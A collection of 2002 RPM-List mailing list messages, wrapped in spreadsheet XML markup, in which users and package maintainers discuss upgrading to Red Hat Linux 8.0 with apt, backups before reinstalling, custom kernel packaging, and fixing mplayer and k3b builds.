_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Mark wrote :&gt; I remember apt-get dist-upgrading from 7.2 to 7.3 fine, so it -should- 
&gt; work, maybe :)I've done that too, on many production servers. The only little
(unimportant) catch is to replace "kernel-headers" by "glibc-kernheaders",
a simple "apt-get install glibc-kernheaders" taking care of that.Upgrading between releases is meant to work, not between betas or beta and
releases. The reason is simple : Some packages may have been downgraded,
some others may have been rebuilt with the same versions but different
dependencies. For both these categories of packages, the upgrade through
apt/rhn/whatever just won't do, as some older packages might be considered
as the newest, thus being kept on the system.As Red Hat does, I really don't recommend trying to upgrade between betas
or from a beta to a final release either. Simply backup your /home, /etc
(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
probably save a few hassles and you'll get the cleanest possible system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</si>
  <si>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Tue, 1 Oct 2002, Angles Puglisi wrote:
&gt; Is it possible to use new apt to do (null) to RH8 upgrade?Possible - should be, it was possible to update to (null) from RH7.3 with 
apt. Did that on my laptop and well.. it was painfull to say the least 
(including a ecovery from totally corrupted rpmdb) Don't expect it to be 
an easy 'dist-upgrade' at any rate, so much stuff has changed and apt 
doesn't always handle all that well the way dependencies are set in 
RHL.&gt; 
&gt; Even if it's possible, are there good reasons why maybe I should not do
&gt; it and just use the RH iso's (I don't think RH8 will upgrade from
&gt; (null), maybe up2date will)?It's possible but not supported by RH. I've upgraded both my laptop and my 
home box from (null) to RH8.0 and didn't encounter any issues though.-- 
	- Panu -
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Julian wrote :&gt; I would appreciate it if you could get Gabber packages for Red Hat 8. I 
&gt; will be making a new release soon, but even in the meantime, 0.8.7 
&gt; packages would be ok.
&gt; 
&gt; I know that in the beta, red hat was using a modified version of 
&gt; gnome-libs which is incompatible with the latest gnomemm. If this is 
&gt; still the case in 8, I can send you a patch which makes gnomemm work 
&gt; again...I'm facing another problem right now. It looks like libsigc++ is no longer
included in the distribution, and gtkmm won't compile without it :-/
I guess I'll have to repackage it myself for 8.0 (assuming it's possible).Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.28 0.15 0.10_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Matthias wrote :&gt; I'm facing another problem right now. It looks like libsigc++ is no
&gt; longer included in the distribution, and gtkmm won't compile without it
&gt; :-/ I guess I'll have to repackage it myself for 8.0 (assuming it's
&gt; possible).Well,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cause?Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.19 0.15 0.16_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>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space).These media files are backed up - ON THE CD'S THEY CAME FROM! Yes I learned that
used CDs make inexpensive backup copy on the shelf. I do not want to re-rip all
this crap again.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Matthias Saou (matthias@egwn.net) wrote*:
&gt; &gt;As Red Hat does, I really don't recommend trying to upgrade between betas
&gt; &gt;or from a beta to a final release either. Simply backup your /home, /etc
&gt; &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
&gt; &gt;probably save a few hassles and you'll get the cleanest possible system ;-)
&gt; 
&gt; I think this is probably the best way, because I think (maybe) with upgrading you
&gt; do not always automatically get the latest feature enabled in some config file
&gt; because RH would rather take it easy and not update that config file (you get a
&gt; rpmnew instead of rpmsaved file) so they get less calls to support that way.If you dislike Red Hat, why use it ? This was a really bad argument 
against using Red Hat that makes no sense at all.  I for one am GLAD that 
they 
a) don't overwrite your config files on a whim (be GLAD they don't do some 
sort of autodetection and changing crap)
b) tell you on rpm upgrade what config files you should look at because 
formats have changed.Red Hat is not "taking it easy" on this, it's putting control in the hands 
of you, the maintainer of the machine.  Don't be lazy.&gt; Anyway, I have tons of media files in /home/* probably 5 to 10 gigs at least, my
&gt; laptop's CDROM takes 700MB at a time (obviously) and compressing media files is
&gt; dumb because they are already compressed. Dumb question: how to backup huge data?
&gt; Network backup to another box? I do not have a box with a tape drive, but maybe box
&gt; with a large HD with much free space could take the backup (oops, I do not have a
&gt; space computer with a large HD with much free space).You don't need to backup /home if you are careful enough.  You did put 
/home on a separate partition, no ? Just install rh80 and tell it to use 
the same partition as /home and tell it to NOT format it, but keep the 
data as is.If you didn't put /home on a separate partition, then you really do need 
to make backups.  Use an nfs or smb mount from another machine to backup 
and rsync straight to the mount, or if that's not possible, rsync over 
ssh.  It's the best way to make backups.&gt; These media files are backed up - ON THE CD'S THEY CAME FROM! It's the other way around - your media files are backups of the CD's they 
came from ;)Good luck,
Thomas
-- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
You know the shape my breath will take before I let it out
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2 Oct 2002 09:44:15 +0200 (CEST), Thomas Vander Stichele  wrote:&gt; &gt; Matthias Saou (matthias@egwn.net) wrote*:
&gt; &gt; &gt;As Red Hat does, I really don't recommend trying to upgrade between betas
&gt; &gt; &gt;or from a beta to a final release either. Simply backup your /home, /etc
&gt; &gt; &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll
&gt; &gt; &gt;probably save a few hassles and you'll get the cleanest possible system ;-)    Yeah, I need to work this out, too; I just learned my lesson about living on the bleeding edge. Lesson learned?  NO MORE XIMIAN, UNDER ANY CIRCUMSTANCES.  Man, that was annoying.    Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my home directories, music and games on other partitions) and while I have the 8.0 stuff in the list, everything I want to upgrade requires 200+ RPMs.    I'm not opposed to this, but apt is.  "apt-get dist-upgrade" dumps core.    What's the inside secret here, or do I just start searching mirrors for the ISO and get over it?  
------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
Just machines, to make big decisions- programmed by fellas with
compassion and vision.  We'll be clean when that work is done;
Eternally free and eternally young.  Linux._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ben wrote :&gt; I use a mostly Red Hat 8.0 system, but prefer to configure and build my 
&gt; kernel by hand.  I'd like to humbly offer a tweak to alsa-driver.spec 
&gt; that helps it build cleanly under such circumstances.  I recognize that 
&gt; freshrpms.net packages are designed with standard Red Hat in mind, 
&gt; including a standard kernel RPM.  However, I hope that Matthias will 
&gt; consider the tweak small enough to justify its incorporation.Well, I don't really find it consistent at all to use an rpm package built
against something that wasn't installed through rpm :-/What I'd recommend in your case : You should keep at least one original Red
Hat Linux kernel (you do just in case, right? ;-)) and install the matching
alsa-kernel package as you'll need at least one because of the
dependencies. Then for your custom built kernel, simply "./configure
--with-cards=all &amp;&amp; make &amp;&amp; make install DESTDIR=/tmp/alsa-driver" from the
alsa-driver sources then as root copy all the modules under
/tmp/alsa-driver/lib/modules/ to your modules dir and run "depmod -a".Of course you can even make it much faster by not compiling all un-needed
drivers, as I guess that's one of the reasons one would rebuild his own
kernel.I find this the easiest and cleanest way to get around the problem. It's
what I've done and what I'll keep doing on my laptop where I'm running a
kernel recompiled with ACPI.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.00 0.02 0.00_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
&gt; Well, I don't really find it consistent at all to use an rpm package
&gt; built against something that wasn't installed through rpm :-/Oh well.  Fair enough.&gt; What I'd recommend in your case [...]Ugh, way too much manual labor.  :-)What I've done instead is to create a tiny little "kernel.spec" that
installs no files but claims to produce a kernel package having version
number `uname -r` for architecture `uname -p`.  It also claims to
provide kernel-sources at the same version.  That is enough to make
alsa-driver.spec happy, and at least forms a reasonable representation
of what my homemade kernel provides to the system.  I should have
thought of this approach sooner._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :&gt;     Yeah, I need to work this out, too; I just learned my lesson about
&gt;     living on the bleeding edge. Lesson learned?  NO MORE XIMIAN, UNDER
&gt;     ANY CIRCUMSTANCES.  Man, that was annoying.We all learned that sooner or later, right? When I got down to that myself
is when I started redhat.aldil.org, now known as freshrpms.net ;-)&gt;     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my
&gt;     home directories, music and games on other partitions) and while I
&gt;     have the 8.0 stuff in the list, everything I want to upgrade requires
&gt;     200+ RPMs.
&gt; 
&gt;     I'm not opposed to this, but apt is.  "apt-get dist-upgrade" dumps
&gt;     core.Strange.
Anyway, although I'd easily recommend upgrading 7.x to 7.3 using apt, I
wouldn't for 7.x to 8.0 as they are C++ binary incompatible... and apt is
entirely written in C++ and dynamically linked :-/Still, that doesn't explain a core dump :-(&gt;     What's the inside secret here, or do I just start searching mirrors
&gt;     for the ISO and get over it?Why "search"? There's more than enough to choose from here :
http://freshrpms.net/mirrors/psyche.htmlMatthias--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</si>
  <si>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Hi,This has been hashed over a few times on various lists, now I finally got 
around to doing something about it... You can now add
"rpm http://koti.welho.com/pmatilai/ redhat/8.0 task" to your sources.list 
and after apt-get update you can find out what's available with 
'apt-cache search ^task-'These are generated directly from comps.xml of RH8.0 so they contain 
exactly the same packages as you'll get by choosing the various categories 
at install time. I didn't bother including SRPMS for these as they are 
rather uninteresting, if you want you can re-generate the .specs by 
running http://koti.welho.com/pmatilai/comps2task/comps2task.py.BTW the repository only contains the task-packages, you'll need an 
apt-enabled mirror of RH8.0 in your sources.list to actually do anything 
with it.-- 
	- Panu -_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :&gt;    Yeah, but I try to 'take it easy' on your server.  The golden rule of
&gt;    the internet: when you find a free resource, don't piss'em off!  :)  I
&gt;    really appreciate your work; you get done the things I wish I could,
&gt;    and I respect that.Don't worry too much : The day the server gets too busy, I'll cleanup and
publish the addresses of some mirrors, as many ftp mirrors exist (I'm aware
of at least 15), and even an apt one :-)
For now, the limit is far enough : When I unlocked the Psyche ISO images on
Monday, the bandwidth usage on the current (ftp|http|rsync) freshrpms.net
server went up to 90Mbps sustained, which is not bad as the server has a
100Mbps physical NIC! Of course, I'd get in trouble if it was always like
that, but the average used when no new Red Hat release is there is between
2 and 4Mbps, which my company tolerates, as I've convinced them it's a
useful return to the community providing us the great operating system all
our servers are running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</si>
  <si>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Wed, 2 Oct 2002 10:53:24 +0200, Matthias Saou  wrote:&gt; &gt;     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my
&gt; &gt;     home directories, music and games on other partitions) and while I
&gt; &gt;     have the 8.0 stuff in the list, everything I want to upgrade requires
&gt; &gt;     200+ RPMs.   Yeah, but I try to 'take it easy' on your server.  The golden rule of the internet: when you find a free resource, don't piss'em off!  :)  I really appreciate your work; you get done the things I wish I could, and I respect that.&gt; Anyway, although I'd easily recommend upgrading 7.x to 7.3 using apt, I
&gt; wouldn't for 7.x to 8.0 as they are C++ binary incompatible... and apt is
&gt; entirely written in C++ and dynamically linked :-/    OK, I'll search for the ISOs on the  one remaining site that isn't hammered.  :)
&gt; Still, that doesn't explain a core dump :-(    Sure: this is a linking issue, right?  Right now I'm still pure-vanilla.  I have the stock version of rpm/rpmlib/popt/etc and the recommended version of apt that you gave me.  No, wait...there's no new code getting loaded.  I don't know, either.  It's been a long day.&gt; &gt;     What's the inside secret here, or do I just start searching mirrors
&gt; &gt;     for the ISO and get over it?
&gt; 
&gt; Why "search"? There's more than enough to choose from here :
&gt; http://freshrpms.net/mirrors/psyche.html   The hunt continues- with a new field!  (Actually I checked there yesterday, but it's worth another shot.)    Thanks!
------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
Just machines, to make big decisions- programmed by fellas with
compassion and vision.  We'll be clean when that work is done;
Eternally free and eternally young.  Linux._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, ""Angles" wrote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now?Parted is your friend! You can't do _everything_, the most limiting being
that you can't move the start of a partition, but it's quite powerful
nevertheless, and I've been very happy with it the few times I've had to
use it.&gt;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example).HTH,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</si>
  <si>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Matthias Saou (matthias@egwn.net) wrote*:
&gt;You're really better off backuping all placed where you know you've hand
&gt;edited or installed some files. For me that's only /etc/, /root/ and
&gt;/home/. Then you reinstall cleanly, formating "/", put your /home/ files
&gt;back into place and you're ready to go.Matthias I gotta believe you, I've been using your RPMs for some time now :) That's
the way I'll do it. A clean start but with the old configs at the ready for diff-
ing when needed. I'll find some old HD for those media files.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Gary wrote :&gt; On Wed, Oct 02, 2002 at 10:09:19AM +0200, Matthias Saou wrote:
&gt; &gt; Well, I don't really find it consistent at all to use an rpm package
&gt; &gt; built against something that wasn't installed through rpm :-/
&gt; 
&gt; Following that reasoning, I've been installing all my custom-built
&gt; kernels through rpm recently. I find it annoying, though, that 
&gt; alsa-kernel, and similar packages, will only build for the currently 
&gt; running kernel.
&gt; 
&gt; So I've attached a patch to specify an alternate kernel by setting the
&gt; "TARGET_KERNEL" environment variable before running rpmbuild. You
&gt; still need to have the rpm for the specified kernel installed, but at
&gt; least it doesn't have to be currently running. It's kinda hackish, so
&gt; if someone has a better way to do this, let me know.That idea looks good although it maybe needs to be tweaked a bit more (what
you sent doesn't support packages named "kernel-smp"). I'd also prefer a
cleaner way than the env variable, and preferrably not editing the spec...
probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?
The BuildRequires on "kernel-source" will also need to be removed because
it won't necessarily need to be true, and that does bug me a bit :-/More ideas are welcome.
Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.08 0.06 0.03_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, ""Angles" wrote :&gt; Matthias Saou (matthias@egwn.net) wrote*:
&gt; &gt;You're really better off backuping all placed where you know you've hand
&gt; &gt;edited or installed some files. For me that's only /etc/, /root/ and
&gt; &gt;/home/. Then you reinstall cleanly, formating "/", put your /home/ files
&gt; &gt;back into place and you're ready to go.
&gt; 
&gt; Matthias I gotta believe you, I've been using your RPMs for some time now
&gt; :) That's the way I'll do it.I'm no "messiah", just do what you think suits you the best :-)Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.05 0.06 0.03_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">HeySince I upgraded to redhat8 mplayer -vo sdl isnt working for me
It gives me black screen and I only hear sound.can anyone help me with this ?btw,
also the source rpm specified that I can do --without libdv
but it didn't work, worked for lirc and arts.Thanks,
Roi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :&gt; Since I upgraded to redhat8 mplayer -vo sdl isnt working for me
&gt; It gives me black screen and I only hear sound.
&gt; 
&gt; can anyone help me with this ?I'll test this as soon as I can.&gt; btw,
&gt; also the source rpm specified that I can do --without libdv
&gt; but it didn't work, worked for lirc and arts.Should be fixed : You probably had libdv-devel installed and MPlayer
automatically detected it. The new spec file explicitely passes
--disable-libdv when the package is rebuilt with --without libdv.Grab the "fr2.1" spec from here :
http://freshrpms.net/builds/index.html?build=mplayerMatthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.02 0.10 0.15_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt;&gt; &gt; Well, I don't really find it consistent at all to use an rpm package
 &gt;&gt; &gt; built against something that wasn't installed through rpm :-/
 &gt;&gt;
 &gt;&gt; Following that reasoning, I've been installing all my custom-built
 &gt;&gt; kernels through rpm recently. I find it annoying, though, that
 &gt;&gt; alsa-kernel, and similar packages, will only build for the currently
 &gt;&gt; running kernel.
 &gt;&gt;
 &gt;&gt; So I've attached a patch to specify an alternate kernel by setting the
 &gt;&gt; "TARGET_KERNEL" environment variable before running rpmbuild. You
 &gt;&gt; still need to have the rpm for the specified kernel installed, but at
 &gt;&gt; least it doesn't have to be currently running. It's kinda hackish, so
 &gt;&gt; if someone has a better way to do this, let me know.
 &gt;
 &gt;That idea looks good although it maybe needs to be tweaked a bit more (what
 &gt;you sent doesn't support packages named "kernel-smp"). I'd also prefer a
 &gt;cleaner way than the env variable, and preferrably not editing the spec...
 &gt;probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?
 &gt;The BuildRequires on "kernel-source" will also need to be removed because
 &gt;it won't necessarily need to be true, and that does bug me a bit :-/	Me and my kernel rpm builds ... this all works along the same idea I have 
been aiming for, but the freaking RedHat Kernel srpms still have been stump 
...	If we could get this and the alsa driver stuff working, it would be whole 
lot easier to try out a newer kernel ... but then the size of these rpms 
are huge, at least for us n^1 world courties ... ;-{ ...	I will keep watching and hoping that somebody comes up with a great working 
idea ...Thanks guys.
Mailed
Lee
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 4 Oct 2002, Mark Derricutt wrote:&gt;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1.5.2?They want to preserve binary compatibility for all .x releases. Red Hat 
8.0 has python 2.2 as default.-- 
	- Panu -
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 4 Oct 2002, Mark Derricutt wrote:&gt; Anyone know why Red Hat insist on sticking with python 1.5.2?ehhh?  IANAHNBARHE -- RHL 8.0 is fully python-2, with a back
compatability v 1 shim set.  This has been working and freely
available in their Raw Hide for 5 months for early adopters
and back-porters.Red Hat maintains binary compatability across major releases.  
Its server management tools are heavily Python, and becoming 
more so.To have added mid-stream the python-2 series in the RHL 7.x
series would have been quite disruptive to an existing 
installed base.-- Russ Herrold_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 04 Oct 2002 01:14:28 +0200
Vincent  wrote:# Hello,
# 
# I'm looking for the package k3b for the redhat 8.0, Does anyone know
# 
# where to get it ? I tried to compile but it did an error message:I've been working on a .src.rpm for it.  Their rpm and spec file is
very dirty, so I"m cleaning it up.  I think I have all the build-req's
and the install req's sorted out, but I need more testers.http://geek.j2solutions.net/rpms/k3b/Please try it.-- 
Jesse Keating
j2Solutions.net
Mondo DevTeam (www.mondorescue.org)Was I helpful?  Let others know:
 http://svcs.affero.net/rm.php?r=jkeating_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,how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apt.conf	2002-09-27 14:58:28.000000000 +0300
+++ apt.conf	2002-10-03 21:38:05.000000000 +0300
@@ -4,6 +4,7 @@
   Get 
   {
      Download-Only "false";
+     Show-Upgraded "true";
   };
 };-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Ahh sweet.  Theres a reason for me to upgrade then :-)--On Thursday, October 03, 2002 16:20:46 +0300 Panu Matilainen 
 wrote:&gt; They want to preserve binary compatibility for all .x releases. Red Hat
&gt; 8.0 has python 2.2 as default.                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Jesse Keating wrote:&gt;On Fri, 04 Oct 2002 01:14:28 +0200
&gt;Vincent  wrote:
&gt;
&gt;# Hello,
&gt;# 
&gt;# I'm looking for the package k3b for the redhat 8.0, Does anyone know
&gt;# 
&gt;# where to get it ? I tried to compile but it did an error message:
&gt;
&gt;I've been working on a .src.rpm for it.  Their rpm and spec file is
&gt;very dirty, so I"m cleaning it up.  I think I have all the build-req's
&gt;and the install req's sorted out, but I need more testers.
&gt;
&gt;http://geek.j2solutions.net/rpms/k3b/
&gt;
&gt;Please try it.
&gt;
&gt;  
&gt;
If I get troubles with the .tar.gz source file compilation, will it work 
with the .src.rpm source file compilation ?
If it will, how do I manage with a .src.rpm file, sorry, I don't remeber :(Thanks._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :&gt; how about applying this to the default apt.conf shipped with the
&gt; freshrpms.net apt package?  I found it a bit weird when the behaviour
&gt; changed between the old 0.3.x and the new 0.5.x versions so that when
&gt; doing a "apt-get upgrade", it wouldn't tell me *which* packages were to
&gt; be upgraded, just that it was about to upgrade something...Indeed, I found that strange too, then I noticed the "-u" switch and used
that... but your solution is much better :-) The next apt build will
incorporate this change (not worth a rebuild for this, and as some
relatively important cnc7 bugs are currently being fixed, I'd say cnc8
isn't far off!).Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.02 0.06 0.10_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 04 Oct 2002 03:25:30 +0200
Vincent  wrote:# If I get troubles with the .tar.gz source file compilation, will it
# work with the .src.rpm source file compilation ?
# If it will, how do I manage with a .src.rpm file, sorry, I don't
# remeber :(The .src.rpm will prompt you for what packages you need to complete
the compile.rpmbuild --rebuild --target=$arch file.src.rpm-- 
Jesse Keating
j2Solutions.net
Mondo DevTeam (www.mondorescue.org)Was I helpful?  Let others know:
 http://svcs.affero.net/rm.php?r=jkeating_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking target system type... Invalid configuration
`athalon-redhat-linux': machine `athalon-redhat' not recognized
configure: error: /bin/sh admin/config.sub athalon-redhat-linux failed
error: Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673
(%prep)
RPM build errors:
    user jkeating does not exist - using root
    group jkeating does not exist - using root
    user jkeating does not exist - using root
    group jkeating does not exist - using root
    Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673 (%prep)
[dale@gandalf dale]$_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">oops, I am bad, I need to learn how to spell......
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:&gt;Once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
I didn't had libdv at all, I installed it just to install mplayer.&gt;Grab the "fr2.1" spec from here :
&gt;http://freshrpms.net/builds/index.html?build=mplayer
&gt;
&gt;Matthias
&gt;
&gt;  
&gt;_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:&gt;Once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&gt;Grab the "fr2.1" spec from here :
&gt;http://freshrpms.net/builds/index.html?build=mplayer
&gt;
&gt;Matthias
&gt;
&gt;  
&gt;
The new spec didn't even want to build the package
something with config.mak
Also this new spec looks like the old one, it got libdv and libdv-devel
in the BuildRequires so I just used the normal spec and removed it manully.Roi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :&gt; The new spec didn't even want to build the package
&gt; something with config.makNow that is weird! :-/&gt; Also this new spec looks like the old one, it got libdv and libdv-devel
&gt; in the BuildRequires so I just used the normal spec and removed it
&gt; manully.Indeed, my boo-boo :-( Fixed now.BTW, about the "mplayer -vo sdl" black screen problem you reported, I was
unable to reproduce it on my hom 8.0 computer, it worked as expected.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.10 0.15 0.16, AC on-line, battery charging: 100% (1:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; `athalon-redhat-linux': machine `athalon-redhat' not recognized
&gt; configure: error: /bin/sh admin/config.sub athalon-redhat-linux failed
&gt; error: Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673
&gt; (%prep)Woah ;) did you tweak some flags yourself, like default rpm flags ? What 
dist are you running ? I don't think there's an athalon-redhat-linux 
machine as standard ;) it should be some permutation of athlon and linux, 
and without redhat, but I can't tell for sure.   Any idea where your 
system might be setting this flag ?
 &gt; RPM build errors:
&gt;     user jkeating does not exist - using root
&gt;     group jkeating does not exist - using root
&gt;     user jkeating does not exist - using root
&gt;     group jkeating does not exist - using root
&gt;     Bad exit status from /home/dale/rpmbuild/tmp/rpm-tmp.26673 (%prep)looks like the files are owned by the wrong user (ie the original spec 
builder).Thomas-- The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
&lt;-*-                      -*-&gt;
Goodbye
I've finally arrived
&lt;-*- thomas@apestaart.org -*-&gt;
URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
    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    I was struck by the massive amount of applications, both KDE and Gnome, intuitively seperated NOT by the Gnome/KDE names, but by their **meanings** instead.  It's obvious that someone spent a lot of time improving the usability and graphics to make it more 'international'; the web browser graphic, for example, has a 'world' icon with a mouse wrapped around it. Office-apps have familiar pens, paper, and/or calculators involved.    This is a Linux that I can plop down in front of almost anyone, and they can figure it out.    At some point I'd miss the character of KDE/Gnome, and I'll probably 'hotrod' the graphics setup with my own themes, etc.  But for the wide release, this one's IT.  If you get a chance, try this; I think you'll be surprisingly pleased.
------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
Just machines, to make big decisions- programmed by fellas with
compassion and vision.  We'll be clean when that work is done;
Eternally free and eternally young.  Linux._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
Although it looks like I'm replying to myself, I just haven't gotten
Matthias' reply yet, although I can see it on the website (and I did
subscribe, but probably to the digest).Anyway, Matthias wrote:
&gt; Once upon a time, Steve wrote :
&gt; 
&gt; &gt; I did apt-get update, and it seemed to have gotten the new packages
&gt; 
&gt; Hmmm, "it seems"? Check closer as this may be where the problem is
&gt; coming
&gt; from.
&gt; &gt; but doing things like "apt-get install synaptic" didn't work (neither
&gt; &gt; did other known packages, like apt-get install lame
&gt; &gt; 
&gt; &gt; I just get:
&gt; &gt; root@canarsie:/var/cache/apt # apt-get install lame
&gt; &gt; Reading Package Lists... Done
&gt; &gt; Building Dependency Tree... Done
&gt; &gt; E: Couldn't find package lame
&gt; 
&gt; Could you double check what "apt-get update" does? And eventually post
&gt; the
&gt; output if there are any errors or messages you don't understand.OK, I did it again, and here's what I got:
root@canarsie:/tmp # apt-get update
Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/os release
Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist
Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates release
Get:1 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist [51.8kB]
